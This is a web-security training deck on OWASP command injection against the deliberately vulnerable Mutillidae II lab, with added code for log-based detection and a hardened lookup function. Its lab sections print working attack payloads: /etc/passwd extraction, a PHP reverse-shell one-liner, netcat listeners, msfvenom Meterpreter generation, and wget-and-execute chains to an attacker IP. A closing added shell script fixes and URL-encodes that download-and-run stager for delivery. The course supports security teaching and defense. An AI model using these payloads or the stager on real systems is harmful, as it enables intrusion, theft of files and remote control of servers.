Web Application Security


OWASP A1 - Command Injection

Jeremy Druin
Certified Lead Information Security Analyst
GWAPT-GOLD, GXPN, GPEN, GWAPT, GMOB, GSEC, Sec+

© Copyright Jeremy Druin - All Rights Reserved

Web Application Security - OWASP A1-Injection

INTRODUCTION TO INJECTION

Injection

• Injection may be possible when input (data) is incorporated with code/script fragments passed to an interpreter
• Any dynamically generated code/script passed to interpreters at runtime may be vulnerable
  • SQL, CGI, XML, JavaScript, SMTP, LDAP, Xpath, NoSQL
• An interpreter cannot distinguish the code from the data incorporated at runtime

Injection

• While the developer intends input to be treated as data, interpreters use context to decide what to execute
• Example
    Code:              ping
    Input Data:        www.google.com
    Developer sees:    ping www.google.com
    Interpreter sees:  ping www.google.com
• Developer "knows" code is blue / data is red

Injection

• While the developer intends input to be treated as data, interpreters use context to decide what to execute
• Example
    Code:              ping
    Input Data:        www.google.com; cat /etc/passwd
    Developer sees:    ping www.google.com; cat /etc/passwd
    Interpreter sees:  ping www.google.com; cat /etc/passwd
• Interpreter "knows" ping and cat are commands

Injection

• The developer intends for data to enter the application and assumes this will always be the case
• An interpreter cannot distinguish the code intended by the developer from the data incorporated at runtime
• Both code and data are ASCII text
• Interpreters attempt to use context to decide and "first match wins"
• From the interpreter's point of view the developer's intentions are ambiguous

INTRODUCTION TO COMMAND INJECTION

Command Injection

• Injecting snippets of shell script/CGI script into an application that passes operating system commands to the host
• May occur when application incorporates user supplied input into the operating system command passed to the host
• Attack takes advantage of the trust the host (operating system) has in the application
• The trust boundary violated is between the web application and the operating system
• The attack executes on the host operating system under the application's account

COMMAND INJECTION BY EXAMPLE

Command Injection

• The DNS Lookup page in Mutillidae II passes the IP address/host name submitted by the user to the nslookup command

    http://mutillidae/index.php?page=dns-lookup.php

Command Injection

• Note: Mutillidae contains tutorials that may be helpful

Command Injection - Vulnerable server-side source code

Field target_host

    $lTargetHost = $_REQUEST["target_host"];
    echo '<pre>'
        .shell_exec("nslookup " . $lTargetHost)
        .'</pre>';

Command Injection

• When user submits a value, the server incorporates the value into an operating system command

    $lTargetHost = $_REQUEST["target_host"];
    echo '<pre>'
        .shell_exec("nslookup " . $lTargetHost)
        .'</pre>';

    nslookup www.google.com

Command Injection

• The O/S will execute the initial command then injected commands

    nslookup www.google.com; ls

Command Injection

• Commands can be chained

    nslookup www.google.com; cd /; ls

Command Injection

• Commands can be run to explore system, escalate privilege and open resources

    $lTargetHost = $_REQUEST["target_host"];
    echo '<pre>'
        .shell_exec("nslookup " . $lTargetHost)
        .'</pre>';

    nslookup www.google.com && cat /etc/passwd

Command Injection

(Screenshot: command injection result in the DNS Lookup page)

LOCATING COMMAND INJECTION

Locating Command Injection

• Look for pages that appear to execute system commands
  • ping, nslookup, traceroute, etc.
  • CGI scripts

Locating Command Injection

• Attempt to identify the operating system
  • HTTP Response vanity headers
    • x-powered-by, Server, x-aspnet-version, etc.
  • May be able to infer operating system from clues
    • ASP.NET runs on Windows exclusively
    • IIS version is tied directly to operating system version

Locating Command Injection

• Attempt to identify the operating system
  • May be able to infer operating system from clues
    • ASP.NET runs on Windows exclusively
    • IIS version is tied directly to operating system version
  • Attempt to cause any error on any page
    • Error message may reveal operating system

(Screenshot: file paths imply Linux operating system)

Locating Command Injection

• Attempt to fuzz input fields to cause error message
  • Characters reserved in operating system shell
    • /bin/bash: ! # $ % & ' ( ) * + , - . / : ; | ' ` , ; = ( ) ! " [ ] . * ?
  • Non-alphanumeric ASCII characters
  • Command injection values from Fuzz DB
  • Note shell functions may not display standard error
    • When assessing "blind" pages errors may be inferred by missing output

Locating Command Injection

• Blind Command Injection
  • Some vulnerable pages may not produce explicit output
  • Two methods may help detect command injection vulnerabilities in these cases
    • Missing output
    • Time-delay inference

Locating Command Injection

• When fuzzing for command injection note when pages are missing output
  • In some cases an error caused by fuzzing for command injection may interrupt the normal flow of execution
  • The site may suppress error messages resulting in neither normal output nor error output
  • The site may only display information from standard output (stdout) but not from the standard error file handle (stderr)
  • The injected value may halt execution of the shell command before the command can generate output
  • Use differential analysis to detect differences between a baseline response and other responses

Locating Command Injection

• By causing the response time to increase measurably it may be possible to detect command injection without visible output
  • Use time-delay inference comparing the average time of a normal response against an attacker chosen time delay
  • If the site is delayed as expected command injection has likely taken place
• Example
  • If a page typically takes two seconds to load and an attacker injects a command that takes 15 seconds to execute, a response time of 17 seconds implies a vulnerability

Locating Command Injection

• Time-delay inference should be attempted with commands most users are allowed to execute that cause a predictable delay
  • ping may work well due to running in one second increments and being executable by users on Windows and Linux against the loopback interface
    • Windows: ping -n 15 127.0.0.1
    • Linux: ping -i 15 -c 2 127.0.0.1
  • Try prefixing and suffixing the injection with chaining characters discussed in upcoming slides
    • ||, |, &&, &, `

TESTING COMMAND INJECTION

Testing Command Injection

• Once vulnerability located (or at least suspected) test for commands
  • The source code prior to the injection point cannot be controlled
  • The injection must work with the existing command
  • Successful command injection typically requires chaining

    $lTargetHost = $_REQUEST["target_host"];
    echo '<pre>'
        .shell_exec("nslookup " . $lTargetHost)
        .'</pre>';

    (Callout: injection occurs here so attacker influence begins at this point)

Testing Command Injection

• Command chaining allows one command to be executed once the previous completes

Windows
    command1 <newline> command2   Runs the first command then the second command
    command1 & command2           Runs the first command then the second command
    command1 && command2          Run second command only if first command successful
    command1 || command2          Run second command only if first command fails

Testing Command Injection

• Command chaining allows one command to be executed once the previous completes

Linux
    command1 <newline> command2   Runs the first command then the second command
    command1; command2            Runs the first command then the second command
    command1 & command2           Runs the first command then the second command
    command1 && command2          Run second command only if first command successful
    command1 || command2          Run second command only if first command fails
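Added detection example, not from the slides or Mutillidae: it scans constructed Apache-style access-log lines for the dns-lookup.php target_host parameter and flags the chaining operators from the two tables above, the reserved shell characters from the fuzzing slide, and the ping-based time-delay probe. The client IPs, timestamps and the /mutillidae/index.php path in the sample lines are constructed for this example.

```python
"""Added detection example: find command-injection probes against the
Mutillidae dns-lookup.php target_host parameter in web-server access logs.
Not from the slides; the log lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Chaining operators from the Windows/Linux chaining tables, plus backtick
# and a raw newline. Longer operators are checked first so "&&" is not
# also reported as "&".
CHAIN_OPERATORS = ("||", "&&", "|", "&", ";", "`", "\n")
# Reserved shell characters from the fuzzing slide, minus '.', '-' and ':'
# which are legitimate in host names and IPv6 literals.
RESERVED = set("!#$%&'()*+,/;|`\"[]=?<>")
# Time-delay probes: "ping -n N" (Windows) or "ping -i N" (Linux).
TIME_DELAY_RE = re.compile(r"\bping\s+-(?:n|i)\s+\d+")
# Universal binaries the testing slides inject first.
PROBE_BINARY_RE = re.compile(
    r"\b(?:ls|pwd|dir|cd|whoami|cat|telnet|tracepath|wget|nc)\b")

# Common Log Format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')


def extract_target_host(request_target):
    """Return the decoded target_host value of a dns-lookup.php request,
    or None when the request is for something else."""
    parts = urlsplit(request_target)
    query = parse_qs(parts.query, keep_blank_values=True)  # one decoding pass
    if query.get("page", [""])[0] != "dns-lookup.php":
        return None
    values = query.get("target_host")
    if not values:
        return None
    return unquote(values[0])  # second pass catches double-encoded payloads


def classify(value):
    """Return the indicators present in a target_host value (empty = clean)."""
    hits = []
    found, rest = [], value
    for op in CHAIN_OPERATORS:
        if op in rest:
            found.append("<newline>" if op == "\n" else op)
            rest = rest.replace(op, " ")
    if found:
        hits.append("chaining:" + " ".join(found))
    reserved = sorted(RESERVED.intersection(value))
    if reserved:
        hits.append("reserved:" + "".join(reserved))
    if TIME_DELAY_RE.search(value):
        hits.append("time-delay-probe")
    if PROBE_BINARY_RE.search(value):
        hits.append("probe-binary")
    return hits


def scan_log(lines):
    """Return (client ip, decoded target_host, indicators) per suspicious hit."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not Common Log Format; skip rather than guess
        value = extract_target_host(match.group("target"))
        if value is None:
            continue
        hits = classify(value)
        if hits:
            findings.append((match.group("ip"), value, hits))
    return findings


# Constructed sample log: one benign lookup, two probes, one unrelated page.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2013:13:55:36 -0500] "GET /mutillidae/index.php'
    '?page=dns-lookup.php&target_host=www.google.com HTTP/1.1" 200 1043',
    '198.51.100.7 - - [10/Oct/2013:13:55:41 -0500] "GET /mutillidae/index.php'
    '?page=dns-lookup.php&target_host=www.google.com%3Bcat%20%2Fetc%2Fpasswd'
    ' HTTP/1.1" 200 2210',
    '198.51.100.7 - - [10/Oct/2013:13:56:02 -0500] "GET /mutillidae/index.php'
    '?page=dns-lookup.php&target_host=www.google.com%26%26ping%20-n%2015%20127.0.0.1'
    ' HTTP/1.1" 200 1043',
    '203.0.113.5 - - [10/Oct/2013:13:57:10 -0500] "GET /mutillidae/index.php'
    '?page=user-info.php&username=bob HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for ip, value, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}  target_host={value!r}  {'; '.join(hits)}")
```

The reserved-character check intentionally leaves '.', '-' and ':' out, so ordinary host names and IPv6 literals do not trip it.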

Testing Command Injection

• Start by injecting basic commands that are most likely to work at any privilege level
  • Linux
    • ls   list directory contents
    • pwd  print current directory path
  • Windows
    • dir  list directory contents
    • cd   print current directory path

Testing Command Injection

• Start by injecting basic commands that are most likely to work at any privilege level
  • Directory listing usually possible
  • Printing the current directory; PWD (Linux), CD (Windows) also generally ubiquitous

Testing Command Injection

• Attempt to chain commands based on operating system

USING COMMAND INJECTION

Command Injection

• Once command injection established work towards control of system
  • Determine account and privilege level of current user
  • Determine current location within file system
  • Catalog, locate and pilfer available files
  • Test for outbound connectivity and try to establish shell
  • Attempt to persist access
  • Pivot into internal network

Command Injection Example

• Determine account and privilege level of current user

    www.google.com;whoami;pwd;ls

    whoami   print current user account

Command Injection Example

• Determine current location within file system

    www.google.com;whoami;pwd;ls

    pwd   print current directory
    ls    list contents of current directory

Command Injection Example

• Catalog, locate and pilfer available files

    www.google.com; cat /etc/passwd

COMMAND INJECTION DEFENSE

Command Injection Defense

• Default Deny
• Least Privilege
• Data Execution Prevention

Command Injection Defense

• Default Deny
  • By default the web application account must not be allowed to run any shell commands

(Callout: Someone please explain why this apache server account is allowed to ping. Do web servers need to check to see if their cousin IIS is online?)

Command Injection Defense

• Default Deny
  • If operating system functionality is necessary attempt to call a standard framework function that will supply the same result
  • For example if a PHP application needs to resolve a hostname use standard function gethostbyaddr() rather than executing nslookup via shell_exec()

Command Injection Defense

• Least Privilege
  • The least-privilege principle states applications must only execute specific, preapproved commands
  • Default deny will prevent any commands from executing under the web application account
  • Least-privilege effectively is an exception to default deny for the necessary commands (executable)

Command Injection Defense

• Data Execution Prevention
  • All non-alpha-numeric parameter values passed to the shell script must be escaped
  • Bash: \0xx translates to the octal ASCII equivalent of "nn", where "nn" is a string of digits
  • Input could be shell-script or data, but the interpreter (i.e. Bash) "knows" escaped characters are data
  • This is true even when the input forms syntactically correct shell-script
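Added example, not Mutillidae's or the author's code: a hardened counterpart to the dns-lookup pattern in Python that puts the three defense slides together: default deny through an allow-list on target_host, a library resolver in place of shell_exec("nslookup " ...), a least-privilege argv fallback with no shell, and the escaping approach from this slide shown for comparison. It goes a little beyond the slides by also accepting IPv6 literals; the `resolver` parameter is a hypothetical hook added so the lookup can be exercised offline, and socket.gethostbyname is the assumed library call.

```python
"""Added example: a hardened replacement for the dns-lookup pattern.
Default deny on target_host, a library call instead of shell_exec, and
escaping shown only as the fallback. Not Mutillidae's or the author's code."""
import ipaddress
import re
import shlex
import socket

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 63 chars per label.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"^(?:" + _LABEL + r"\.)*" + _LABEL + r"\.?$")


def is_valid_target(value):
    """Default deny: accept only an IP literal or a syntactically valid host
    name. Every character on the 'reserved in the shell' list, and every
    chaining operator (; & && || ` newline), falls outside this grammar."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)   # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(value) is not None


def resolve_target(value, resolver=socket.gethostbyname):
    """Framework call in place of shell_exec("nslookup " . $lTargetHost):
    no interpreter ever sees the input, so there is nothing to inject into.
    `resolver` is a hypothetical hook so the lookup can be tested offline."""
    if not is_valid_target(value):
        raise ValueError("target_host rejected: not a host name or IP")
    return resolver(value)


def nslookup_argv(value):
    """Least-privilege fallback when the preapproved binary itself is
    required: build an argv list for subprocess.run(..., shell=False).
    With no shell involved, ';' or '&&' would reach nslookup as part of one
    literal argument; the allow-list rejects them before that anyway."""
    if not is_valid_target(value):
        raise ValueError("target_host rejected: not a host name or IP")
    return ["nslookup", value]


def escaped_shell_command(value):
    """The escaping approach for comparison: shlex.quote wraps the value in
    single quotes so Bash treats metacharacters as data. Quoting alone is a
    weaker control than the allow-list above, because the command still
    runs through an interpreter."""
    return "nslookup " + shlex.quote(value)


if __name__ == "__main__":
    # Probe values taken from the slides; none of them reaches a resolver.
    for probe in ("www.google.com", "127.0.0.1",
                  "www.google.com; cat /etc/passwd",
                  "www.google.com && cat /etc/passwd",
                  "www.google.com;whoami;pwd;ls"):
        print(f"{probe!r:40} valid={is_valid_target(probe)!s:5} "
              f"escaped={escaped_shell_command(probe)}")
```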

Command Injection

LAB

Command Injection

• Extract /etc/password

Command Injection to extract /etc/password

• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command Injection to extract /etc/password

• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command Injection to extract /etc/password

• Determine the current directory
  • & pwd

Command Injection to extract /etc/password

• Use directory traversal to move out of the web root directory and access /etc/passwd
  • & cat /etc/passwd

Command Injection

LAB

Command Injection

• Reverse bash shell
  • Reference: demo-command-injection-reverse-shell-via-php.txt

Command injection to gain reverse bash shell

• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command injection to gain reverse bash shell

• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command injection to gain reverse bash shell

• Send commands testing outbound connectivity from vulnerable server back to attacker controlled host
  • Set up listener on attacker controlled host
  • Attempt to have web application server reach out to attacker host over various protocols and ports
    • ICMP -> ping -c 1 10.0.0.164
    • UDP -> tracepath -c 1 10.0.0.164
    • TCP -> telnet 10.0.0.164 1234
  • Test ports and protocols likely to be allowed
    • DNS, web, proxy, etc.

Command injection to gain reverse bash shell

• Set up tcpdump on local host filtering for incoming packets destined for attacker IP
  • tcpdump -i eth0 -vv -X dst

Command injection to gain reverse bash shell

• Attempt to have web application send packet
  • www.google.com; tracepath -c 1 10.224.35.168 (UDP)
  • www.google.com & telnet 10.224.35.168 1234 (TCP)

(Screenshot: attacking host receives packet confirming connectivity)

Command injection to gain reverse bash shell

• If outbound connectivity established attempt to have web server connect back to attacker host
  • Set up listener on attacker host

    nc -l -p 1234

Command injection to gain reverse bash shell

• If outbound connectivity established attempt to have web server connect back to attacker host
  • Once listener set-up, ask web application server to connect back to attacker host
  • Set IP address appropriately

    www.google.com;php -r '$sock=fsockopen("",);exec("/bin/sh -i &3 2>&3");'

Command injection to gain reverse bash shell

• Once web application server establishes connection, a shell should be opened
  • Note a shell is not a terminal
  • The shell runs with the privileges of the web application account

(Screenshot: type commands into shell)

Command Injection

LAB

Command Injection

• Reverse Meterpreter
  • Reference: demo-command-injection-via-meterpreter-php-shell-upload.txt

Command injection to gain reverse Meterpreter shell

• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command injection to gain reverse Meterpreter shell

• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command injection to gain reverse Meterpreter shell

• Send commands testing outbound connectivity from vulnerable server back to attacker controlled host
  • Set up listener on attacker controlled host
  • Attempt to have web application server reach out to attacker host over various protocols and ports
    • ICMP -> ping -c 1 10.0.0.164
    • UDP -> tracepath -c 1 10.0.0.164
    • TCP -> telnet 10.0.0.164 1234
  • Test ports and protocols likely to be allowed
    • DNS, web, proxy, etc.

Lab (slide 66): Command injection to gain reverse Meterpreter shell

• Set up tcpdump on the local host, filtering for incoming packets destined for the attacker IP

  tcpdump -i eth0 -vv -X dst <attacker IP>

Lab (slide 67): Command injection to gain reverse Meterpreter shell

• Attempt to have the web application send a packet
  • www.google.com; tracepath -c 1 10.224.35.168  (UDP)
  • www.google.com & telnet 10.224.35.168 1234  (TCP)
• The attacking host receives the packet, confirming connectivity

Lab (slide 68): Command injection to gain reverse Meterpreter shell

• Assuming the vulnerable web server can connect back to the attacker host, it may be possible to force the web server to download a payload
  • A web server can be set up on the attacker host
  • A command injection can cause the web server to download and execute content

  wget http://<attacker IP>/php-meter-script.txt -O /tmp/php-meter-script.php   (download and save the file from the attacker host)
  php -f /tmp/php-meter-script.php                                              (execute the file with the PHP interpreter)

Lab (slide 69): Command injection to gain reverse Meterpreter shell

• Search available payloads for those that offer PHP Meterpreter

  msfvenom --list payloads | grep php/meter

Lab (slide 70): Command injection to gain reverse Meterpreter shell

• Use msfvenom to generate the Meterpreter PHP payload

  msfvenom --arch php --platform PHP --payload php/meterpreter/reverse_tcp --format raw lhost=<attacker IP> lport=<attacker port> > /var/www/html/commented-php-meter-script.txt

Lab (slide 71): Command injection to gain reverse Meterpreter shell

• msfvenom puts a comment symbol at the front of the PHP Meterpreter payload
• Remove the comment symbol

  sed 's/\/\*//' /var/www/html/commented-php-meter-script.txt > /var/www/html/php-meter-script.txt

Lab (slide 72): Command injection to gain reverse Meterpreter shell

• Start the Apache web server on the attacking host
• The web server will serve the Meterpreter PHP shell when the vulnerable web server requests the file

Lab (slide 73): Command injection to gain reverse Meterpreter shell

• Start a listener on the attacking host for Meterpreter to connect to

  msfconsole
  msf > use multi/handler
  msf exploit(handler) > set payload php/meterpreter/reverse_tcp
  msf exploit(handler) > set lhost <attacker IP>
  msf exploit(handler) > set lport <attacker port>
  msf exploit(handler) > exploit

Lab (slide 74): Command injection to gain reverse Meterpreter shell

• Inject a command to cause the web server to pull the file from the attacking host and execute the Meterpreter script

  & ;wget http://10.224.35.168/php-meter-script.txt -O /tmp/php-meter-script.php;php -f /tmp/php-meter-script.php

Lab (slide 75): Command injection to gain reverse Meterpreter shell

• If the user the web server runs as has the necessary privileges (to write the file and run the PHP interpreter), the web server will connect back to the attacking host and the handler receives a Meterpreter session
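The lab's last three steps (strip the msfvenom comment, serve the file, inject the wget/php chain) are where the procedure usually breaks in practice, so here is an added, offline-runnable staging script that is not part of the deck. It strips the leading comment on line 1 only, assembles the slides' wget/php chain, and percent-encodes it for delivery in the query string: a raw & in a URL is consumed as a parameter separator by the web server, and the slide's opening "& ;" is rejected by sh as a syntax error, so the chain below opens with ";". Assumptions not stated by the slides: the GET parameter is named target_host (Mutillidae's DNS lookup form field), the attacker host is 10.224.35.168 as used elsewhere in the lab, and the sample payload header is constructed to match the "/*<?php /**/" prefix msfvenom places on raw PHP output.

```shell
#!/bin/sh
# Added example (not from the slides): attacker-side staging for the
# last step of the lab, runnable offline. Assumptions, not stated by the
# deck: the GET parameter is called target_host, the attacker host is
# 10.224.35.168 as in the slides, and the header below is constructed to
# match the "/*<?php /**/" prefix msfvenom puts on raw PHP output.

# 1. Strip the leading "/*" from line 1 only. The slide's sed 's/\/\*//'
#    removes the first "/*" on every line, which is one edit too many if
#    the payload ever spans several lines.
strip_leading_comment() {
  sed '1s#^/\*##'
}

# 2. The injected command, reusing the slides' file names. It opens with
#    ';' rather than the slide's '& ;': a lone '&' followed by ';' is a
#    shell syntax error, and a bare '&' in a query string is split off as
#    a parameter separator by the web server before the shell sees it.
build_stager() {
  printf 'www.google.com; wget http://%s/php-meter-script.txt -O /tmp/php-meter-script.php; php -f /tmp/php-meter-script.php' "$1"
}

# Is this decimal byte value an RFC 3986 unreserved character
# (A-Z a-z 0-9 - . _ ~)?
is_unreserved() {
  [ "$1" -ge 48 ] && [ "$1" -le 57 ] && return 0
  [ "$1" -ge 65 ] && [ "$1" -le 90 ] && return 0
  [ "$1" -ge 97 ] && [ "$1" -le 122 ] && return 0
  case $1 in 45|46|95|126) return 0 ;; esac
  return 1
}

# 3. Percent-encode byte by byte so ';', '&', '|', spaces and slashes in
#    the stager survive the trip through the query string intact.
urlencode() {
  printf '%s' "$1" | od -An -v -tu1 | tr -s ' \n' '\n\n' | while read -r b; do
    [ -n "$b" ] || continue
    if is_unreserved "$b"; then
      printf "\\$(printf '%03o' "$b")"
    else
      printf '%%%02X' "$b"
    fi
  done
}

# 4. Full request against the lab's vulnerable page (host, attacker IP).
build_url() {
  host=$1
  lhost=$2
  printf 'http://%s/mutillidae/index.php?page=dns-lookup.php&target_host=%s' \
    "$host" "$(urlencode "$(build_stager "$lhost")")"
}

# Demonstration: a constructed header with the msfvenom-style prefix, and
# the URL the injection would be delivered in.
sample_header='/*<?php /**/ error_reporting(0); /* payload body follows */'
printf '%s\n' "$sample_header" | strip_leading_comment
build_url localhost 10.224.35.168
echo
```

Before firing the real request, compare the decoded parameter the server logs (or the command the lab page echoes back) with the output of build_stager: if they differ, the encoding, not the injection, is what failed. Because msfvenom's raw PHP payload is normally a single line, the slide's sed and strip_leading_comment produce the same file in the common case; the difference only matters for multi-line payloads.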
